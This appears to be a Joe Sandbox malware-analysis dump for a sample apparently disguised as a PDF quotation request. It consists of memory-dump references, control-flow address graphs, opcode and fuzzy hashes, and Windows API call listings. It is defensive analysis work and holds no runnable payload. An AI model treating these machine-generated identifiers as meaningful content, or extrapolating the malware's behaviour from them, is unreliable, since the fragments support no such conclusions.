                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                  • API String ID: 0-1435242062
                                                                                                                                  • Opcode ID: 0fd37004ec828581c8d7b31da8613938de9b7760b1790d002e4d8f523db2a02e
                                                                                                                                  • Instruction ID: caabe4c0faeba338710fb054b1ec6bdd15ef3693f61b048f02a82dc84ccb3671
                                                                                                                                  • Opcode Fuzzy Hash: 0fd37004ec828581c8d7b31da8613938de9b7760b1790d002e4d8f523db2a02e
                                                                                                                                  • Instruction Fuzzy Hash: A9125A30A006099FCB54CF68D994AAEBBF6FF48314F15855AE845DB361DB31ED41CB60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 301 383c0970-383c0a0f GetCurrentProcess 306 383c0a18-383c0a4c GetCurrentThread 301->306 307 383c0a11-383c0a17 301->307 308 383c0a4e-383c0a54 306->308 309 383c0a55-383c0a89 GetCurrentProcess 306->309 307->306 308->309 310 383c0a8b-383c0a91 309->310 311 383c0a92-383c0aaa 309->311 310->311 323 383c0aad call 383c0b4f 311->323 324 383c0aad call 383c0f31 311->324 315 383c0ab3-383c0ae2 GetCurrentThreadId 316 383c0aeb-383c0b4d 315->316 317 383c0ae4-383c0aea 315->317 317->316 323->315 324->315
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C09FE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 383C0A3B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C0A78
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 383C0AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 223aa49003247e1134b3dbb1d697029791f847819589b8acfd3d3705fbc7eb4f
                                                                                                                                  • Instruction ID: bb2f6ef1729f46c125547ed43d78d18f2f4e27cf68f47fa99fc2e70bd9347001
                                                                                                                                  • Opcode Fuzzy Hash: 223aa49003247e1134b3dbb1d697029791f847819589b8acfd3d3705fbc7eb4f
                                                                                                                                  • Instruction Fuzzy Hash: EB5154B4900789DFDB44DFAAC548BEEBBF1EF89300F20845AE019A7361D7389945CB65

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 652 383c0980-383c0a0f GetCurrentProcess 656 383c0a18-383c0a4c GetCurrentThread 652->656 657 383c0a11-383c0a17 652->657 658 383c0a4e-383c0a54 656->658 659 383c0a55-383c0a89 GetCurrentProcess 656->659 657->656 658->659 660 383c0a8b-383c0a91 659->660 661 383c0a92-383c0aaa 659->661 660->661 673 383c0aad call 383c0b4f 661->673 674 383c0aad call 383c0f31 661->674 665 383c0ab3-383c0ae2 GetCurrentThreadId 666 383c0aeb-383c0b4d 665->666 667 383c0ae4-383c0aea 665->667 667->666 673->665 674->665
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C09FE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 383C0A3B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C0A78
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 383C0AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: c74ebc298b3b2231483b25d7085ef37e63eef630fedefafb2ce84c266a40e633
                                                                                                                                  • Instruction ID: 8f69aa51b93938a958f7604bab04b263fa6831b734598d6736a7b84259855017
                                                                                                                                  • Opcode Fuzzy Hash: c74ebc298b3b2231483b25d7085ef37e63eef630fedefafb2ce84c266a40e633
                                                                                                                                  • Instruction Fuzzy Hash: E95143B4900649DFDB14DFAAC548BEEBBF5EF88300F208459E019A7361D7389980CBA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 675 d19b8-d1a13 679 d1a35-d1a84 675->679 680 d1a15-d1a34 675->680 684 d1a9f 679->684 685 d1a86-d1a8d 679->685 688 d1aa7 684->688 686 d1a8f-d1a94 685->686 687 d1a96-d1a9d 685->687 689 d1aaa-d1abe 686->689 687->689 688->689 691 d1ad4-d1adc 689->691 692 d1ac0-d1ac7 689->692 695 d1ade-d1ae2 691->695 693 d1acd-d1ad2 692->693 694 d1ac9-d1acb 692->694 693->695 694->695 697 d1ae4-d1af9 695->697 698 d1b42-d1b45 695->698 697->698 706 d1afb-d1afe 697->706 699 d1b8d-d1b93 698->699 700 d1b47-d1b5c 698->700 701 d268e 699->701 702 d1b99-d1b9b 699->702 700->699 712 d1b5e-d1b62 700->712 709 d2693-d2c75 701->709 702->701 704 d1ba1-d1ba6 702->704 710 d263c-d2640 704->710 711 d1bac 704->711 707 d1b1d-d1b3b call d02a8 706->707 708 d1b00-d1b02 706->708 707->698 708->707 713 d1b04-d1b07 708->713 715 d2647-d268d 710->715 716 d2642-d2645 710->716 711->710 717 d1b6a-d1b88 call d02a8 712->717 718 d1b64-d1b68 712->718 713->698 720 d1b09-d1b1b 713->720 716->709 716->715 717->699 718->699 718->717 720->698 720->707
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                  • API String ID: 0-4015495023
                                                                                                                                  • Opcode ID: d5d9ed64beaf389d7d95140af0fe15dd8ebdf87532464f92aeaebd1665e1531e
                                                                                                                                  • Instruction ID: 173e9a2aaef72ce4cfaa10e5650278987ce5aa1d3fe96fd8f56b67e893a6a44d
                                                                                                                                  • Opcode Fuzzy Hash: d5d9ed64beaf389d7d95140af0fe15dd8ebdf87532464f92aeaebd1665e1531e
                                                                                                                                  • Instruction Fuzzy Hash: C2225FFAD6D7E55BC712CB306879295BFF0AA22208B1E4DCED0C092193D7A5C486C767

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1374 d4f00-d4f22 1375 d4f38-d4f43 1374->1375 1376 d4f24-d4f28 1374->1376 1379 d4f49-d4f4b 1375->1379 1380 d4feb-d5017 1375->1380 1377 d4f2a-d4f36 1376->1377 1378 d4f50-d4f57 1376->1378 1377->1375 1377->1378 1381 d4f59-d4f60 1378->1381 1382 d4f77-d4f80 1378->1382 1383 d4fe3-d4fe8 1379->1383 1386 d501e-d5076 1380->1386 1381->1382 1384 d4f62-d4f6d 1381->1384 1475 d4f82 call d4ef0 1382->1475 1476 d4f82 call d4f00 1382->1476 1384->1386 1387 d4f73-d4f75 1384->1387 1406 d5078-d507e 1386->1406 1407 d5085-d5097 1386->1407 1387->1383 1388 d4f88-d4f8a 1389 d4f8c-d4f90 1388->1389 1390 d4f92-d4f9a 1388->1390 1389->1390 1392 d4fad-d4fcc 1389->1392 1393 d4f9c-d4fa1 1390->1393 1394 d4fa9-d4fab 1390->1394 1400 d4fce-d4fd7 1392->1400 1401 d4fe1 1392->1401 1393->1394 1394->1383 1479 d4fd9 call d9f6d 1400->1479 1480 d4fd9 call d9eb0 1400->1480 1401->1383 1403 d4fdf 1403->1383 1406->1407 1409 d509d-d50a1 1407->1409 1410 d512b-d512d 1407->1410 1411 d50b1-d50be 1409->1411 1412 d50a3-d50af 1409->1412 1477 d512f call d52b8 1410->1477 1478 d512f call d52c8 1410->1478 1418 d50c0-d50ca 1411->1418 1412->1418 1413 d5135-d513b 1416 d513d-d5143 1413->1416 1417 d5147-d514e 1413->1417 1419 d51a9-d5208 1416->1419 1420 d5145 1416->1420 1423 d50cc-d50db 1418->1423 1424 d50f7-d50fb 1418->1424 1432 d520f-d5233 1419->1432 1420->1417 1435 d50dd-d50e4 1423->1435 1436 d50eb-d50f5 1423->1436 1425 d50fd-d5103 1424->1425 1426 d5107-d510b 1424->1426 1428 d5105 1425->1428 1429 d5151-d51a2 1425->1429 1426->1417 1430 d510d-d5111 1426->1430 1428->1417 1429->1419 1430->1432 1433 d5117-d5129 1430->1433 1443 d5239-d523b 1432->1443 1444 d5235-d5237 1432->1444 1433->1417 1435->1436 1436->1424 1446 d523d-d5241 1443->1446 1447 d524c-d524e 1443->1447 1445 d52b1-d52b4 1444->1445 1451 d5247-d524a 1446->1451 1452 d5243-d5245 1446->1452 1453 d5261-d5267 1447->1453 1454 d5250-d5254 1447->1454 1451->1445 1452->1445 1458 d5269-d5290 1453->1458 1459 d5292-d5294 1453->1459 1455 d525a-d525f 1454->1455 1456 d5256-d5258 1454->1456 1455->1445 1456->1445 1462 d529b-d529d 1458->1462 1459->1462 1465 d529f-d52a1 1462->1465 1466 d52a3-d52a5 1462->1466 1465->1445 1468 d52ae 1466->1468 1469 d52a7-d52ac 1466->1469 1468->1445 1469->1445 1475->1388 1476->1388 1477->1413 1478->1413 1479->1403 1480->1403
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq
                                                                                                                                  • API String ID: 0-4016896955
                                                                                                                                  • Opcode ID: 1a54f2a058873874c485c29b0fd9d337ab794f5e42dda5022bf1c39f26885e44
                                                                                                                                  • Instruction ID: 84d23a0f937a554a4642472ab16584ab23cfa6bef0fe4b8339ea05c6d58b12e7
                                                                                                                                  • Opcode Fuzzy Hash: 1a54f2a058873874c485c29b0fd9d337ab794f5e42dda5022bf1c39f26885e44
                                                                                                                                  • Instruction Fuzzy Hash: 41B1BE347047108FCB259F28D854B7E7BE6AF89301F14456AE846CB3A5DB34CC45DBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1481 d5460-d546d 1482 d546f-d5473 1481->1482 1483 d5475-d5477 1481->1483 1482->1483 1484 d547c-d5487 1482->1484 1485 d5688-d568f 1483->1485 1486 d548d-d5494 1484->1486 1487 d5690 1484->1487 1488 d5629-d562f 1486->1488 1489 d549a-d54a9 1486->1489 1491 d5695-d56cd 1487->1491 1492 d5635-d5639 1488->1492 1493 d5631-d5633 1488->1493 1490 d54af-d54be 1489->1490 1489->1491 1499 d54c0-d54c3 1490->1499 1500 d54d3-d54d6 1490->1500 1511 d56cf-d56d4 1491->1511 1512 d56d6-d56da 1491->1512 1494 d563b-d5641 1492->1494 1495 d5686 1492->1495 1493->1485 1494->1487 1497 d5643-d5646 1494->1497 1495->1485 1497->1487 1501 d5648-d565d 1497->1501 1502 d54c5-d54c8 1499->1502 1503 d54e2-d54e8 1499->1503 1500->1503 1504 d54d8-d54db 1500->1504 1520 d565f-d5665 1501->1520 1521 d5681-d5684 1501->1521 1506 d54ce 1502->1506 1507 d55c9-d55cf 1502->1507 1513 d54ea-d54f0 1503->1513 1514 d5500-d551d 1503->1514 1508 d54dd 1504->1508 1509 d552e-d5534 1504->1509 1517 d55f4-d5601 1506->1517 1515 d55e7-d55f1 1507->1515 1516 d55d1-d55d7 1507->1516 1508->1517 1518 d554c-d555e 1509->1518 1519 d5536-d553c 1509->1519 1522 d56e0-d56e2 1511->1522 1512->1522 1523 d54f4-d54fe 1513->1523 1524 d54f2 1513->1524 1553 d5526-d5529 1514->1553 1515->1517 1525 d55d9 1516->1525 1526 d55db-d55e5 1516->1526 1545 d5615-d5617 1517->1545 1546 d5603-d5607 1517->1546 1539 d556e-d5591 1518->1539 1540 d5560-d556c 1518->1540 1528 d553e 1519->1528 1529 d5540-d554a 1519->1529 1530 d5677-d567a 1520->1530 1531 d5667-d5675 1520->1531 1521->1485 1532 d56e4-d56f6 1522->1532 1533 d56f7-d56fe 1522->1533 1523->1514 1524->1514 1525->1515 1526->1515 1528->1518 1529->1518 1530->1487 1535 d567c-d567f 1530->1535 1531->1487 1531->1530 1535->1520 1535->1521 1539->1487 1557 d5597-d559a 1539->1557 1555 d55b9-d55c7 1540->1555 1548 d561b-d561e 1545->1548 1546->1545 1549 d5609-d560d 1546->1549 1548->1487 1550 d5620-d5623 1548->1550 1549->1487 1554 d5613 1549->1554 1550->1488 1550->1489 1553->1517 1554->1548 1555->1517 1557->1487 1559 d55a0-d55b2 1557->1559 1559->1555
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$,aq
                                                                                                                                  • API String ID: 0-2990736959
                                                                                                                                  • Opcode ID: 3daf4b63d2c583684c5cc0c2701e3eedd11b7769aed97467325e859e2ca41a8d
                                                                                                                                  • Instruction ID: 66e921d1502de60113a55ad072c11596945590ac506e1cb5018fbc809d10ad91
                                                                                                                                  • Opcode Fuzzy Hash: 3daf4b63d2c583684c5cc0c2701e3eedd11b7769aed97467325e859e2ca41a8d
                                                                                                                                  • Instruction Fuzzy Hash: 5481A134A00A058FCB54CF69DC949AEB7F2BF88316B65816AD805DB365DB31EC41CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 4cd50aa81d5c74e1f37cc8943966684ffa76487ca64aef5718a9580677befce4
                                                                                                                                  • Instruction ID: c4e029d61987c54034cd3e925760b543b3606213390b257715b34f62a07d727f
                                                                                                                                  • Opcode Fuzzy Hash: 4cd50aa81d5c74e1f37cc8943966684ffa76487ca64aef5718a9580677befce4
                                                                                                                                  • Instruction Fuzzy Hash: 7B517070B043058FCB64DB69C990ABEB7E6AF88300F15C96AE502DB356DE35DD418BB1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2093 37d5d548-37d5d66d 2112 37d5d710-37d5d741 2093->2112 2113 37d5d673-37d5d6b9 2093->2113 2120 37d5d747-37d5d75e 2112->2120 2118 37d5d6c4-37d5d70f 2113->2118 2119 37d5d6bb-37d5d6bf 2113->2119 2119->2118
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 445975291fb990080ee3cbeee63bfc8cb3631a936dcf6fb777868354287ca156
                                                                                                                                  • Instruction ID: 3f30083c479664e4ff1bed2c7fa6bd64498131a04deeae9ad51c0ee62ad8902c
                                                                                                                                  • Opcode Fuzzy Hash: 445975291fb990080ee3cbeee63bfc8cb3631a936dcf6fb777868354287ca156
                                                                                                                                  • Instruction Fuzzy Hash: C4518F70A002099FCB05EFA8D995A9EBBB2FF89300F108565D045BB266DB35AD45CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq
                                                                                                                                  • API String ID: 0-1488805882
                                                                                                                                  • Opcode ID: 882f76188f1b98f5566df5b1ff95808f65669872d4afa799ec8dd2c2ca940b63
                                                                                                                                  • Instruction ID: 2f7442d270e8aa4f1b1cd519cafee1aec3f8e922a09523c8aa00a507ab5e1cc1
                                                                                                                                  • Opcode Fuzzy Hash: 882f76188f1b98f5566df5b1ff95808f65669872d4afa799ec8dd2c2ca940b63
                                                                                                                                  • Instruction Fuzzy Hash: 19319031B103258BDB6C4A6A999427EB6EABFE4310F18443BE906D3394DF74CC4596B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $]q$$]q
                                                                                                                                  • API String ID: 0-127220927
                                                                                                                                  • Opcode ID: 40bd7014710866876bcc5d3928853d382f71bdaef63cdd286fcb3f43d6b9bded
                                                                                                                                  • Instruction ID: 268759f0a6431bd8d58fcc7073563cee9e4f478b2e98ce38f49d1ac0785a9315
                                                                                                                                  • Opcode Fuzzy Hash: 40bd7014710866876bcc5d3928853d382f71bdaef63cdd286fcb3f43d6b9bded
                                                                                                                                  • Instruction Fuzzy Hash: 8F3145303083054FCB759B79C89463D77A5EF85710B2545BBE05ACB3A5EA64DC81C7B2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 533b823e2c38875506d4dd523fcedf99d91bd663a16c92d09649c25e987e989a
                                                                                                                                  • Instruction ID: 0616afb9d1f7ec36309d1d1401737c60ca9c5b2e822991126ee3f113ede04f38
                                                                                                                                  • Opcode Fuzzy Hash: 533b823e2c38875506d4dd523fcedf99d91bd663a16c92d09649c25e987e989a
                                                                                                                                  • Instruction Fuzzy Hash: 91F0C2353002142FDB091AAA9C6097B7BCBEFCD3A0B04842AF909C73A5DE75CC0183B1
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: eb0db87ff1ec3caabde53751aa2e377f6cbaafc6ad4b3c2267b46abc08eee426
                                                                                                                                  • Instruction ID: 500af0dcd0bb5e27f5cd7d5c25023f6a87664267a2da7a8a34fa2ee4723e606c
                                                                                                                                  • Opcode Fuzzy Hash: eb0db87ff1ec3caabde53751aa2e377f6cbaafc6ad4b3c2267b46abc08eee426
                                                                                                                                  • Instruction Fuzzy Hash: 235103B5C00249EFCF01CFA9C894ACDBFB5BF49310F14816AE518AB220D7759854CF91
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 6d5e3c1ee282417d670732dd16a7b63fda832d8aee1ae570013e37ef3283c299
                                                                                                                                  • Instruction ID: 07b6df2a04341729250fd1743a00a8830600127a98b3567690c62b6e468582e0
                                                                                                                                  • Opcode Fuzzy Hash: 6d5e3c1ee282417d670732dd16a7b63fda832d8aee1ae570013e37ef3283c299
                                                                                                                                  • Instruction Fuzzy Hash: 6351D0B5D00349EFDB14CFA9C894ADEFBB5BF48310F20852AE818AB210D774A845CF91
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 57783788ca064e4bedb3f117f7178af01d24e5b6cdbe2e5c7a093752a9df95ce
                                                                                                                                  • Instruction ID: d51c30518f34b3ddf9fce1feec0071fc6a817ea59744839d35d94a79ba977177
                                                                                                                                  • Opcode Fuzzy Hash: 57783788ca064e4bedb3f117f7178af01d24e5b6cdbe2e5c7a093752a9df95ce
                                                                                                                                  • Instruction Fuzzy Hash: 0941B1B5D00349EFDB14CFA9C894ADEFBB5BF48310F24852AE418AB210D774A945CF91
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 383C1E81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  • Opcode ID: a5b603ec9c331fbd7960880b09dc7fe50c214a36e96ed35fed3e80aaa554ca75
                                                                                                                                  • Instruction ID: 804f9f172d4d334158c913c56588bcb345f329ddd71124049da062a0ae8a9f3f
                                                                                                                                  • Opcode Fuzzy Hash: a5b603ec9c331fbd7960880b09dc7fe50c214a36e96ed35fed3e80aaa554ca75
                                                                                                                                  • Instruction Fuzzy Hash: 4641F5B9A00305DFDB14CFA9C444AAEFBF5FF88314F248459D519AB321D774A841CBA1
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 383C0C4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: ac9a251cc82f39066799f8e4a717963ccbe75f60cb0c895fb2aa02aa27585e57
                                                                                                                                  • Instruction ID: fd4b87790a8c02ea26f4997dfcd52743198487f489df03654712ddf45aa6d0f6
                                                                                                                                  • Opcode Fuzzy Hash: ac9a251cc82f39066799f8e4a717963ccbe75f60cb0c895fb2aa02aa27585e57
                                                                                                                                  • Instruction Fuzzy Hash: 5C21C4B5900249AFDB10CFAAD584ADEFBF9FB48310F14841AE958A7310D378A954CFA5
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 383C0C4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: 0bc256ba6b8e73b629eca4bbed58d21e963db85ee0da52fe833cce2eefe013dd
                                                                                                                                  • Instruction ID: d7f88d6a5fe731d951b9d689b6cf0451f31cc190976e8bfb8ad4553d0964312f
                                                                                                                                  • Opcode Fuzzy Hash: 0bc256ba6b8e73b629eca4bbed58d21e963db85ee0da52fe833cce2eefe013dd
                                                                                                                                  • Instruction Fuzzy Hash: 8821C4B5900249AFDB10CFAAD584ADEFBF4FB48310F14841AE958A7310D378A954CFA5
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2870079774-0
                                                                                                                                  • Opcode ID: 9dec076e593029b2e9a8c638219b1f8756db041a2ded27a5ae143f1a8120af5a
                                                                                                                                  • Instruction ID: 232a38064b2f237a3d4bfaafb30da0217f09c3e2ced1f0b9f61f3e0256cb0638
                                                                                                                                  • Opcode Fuzzy Hash: 9dec076e593029b2e9a8c638219b1f8756db041a2ded27a5ae143f1a8120af5a
                                                                                                                                  • Instruction Fuzzy Hash: A311F2B58003499FDB10DFAAD845BDEFBF8EB48760F10841AE558A7250C379A994CFA1
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 383CD445
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: f7d9512aaa3af56dc885276bbc2a02f71c55a631a2cb7e61dd4028e1a20d052a
                                                                                                                                  • Instruction ID: 50f2e9f48fa807265e2e25307f3aa29e19e75fc75740428d72877ff9fab0528b
                                                                                                                                  • Opcode Fuzzy Hash: f7d9512aaa3af56dc885276bbc2a02f71c55a631a2cb7e61dd4028e1a20d052a
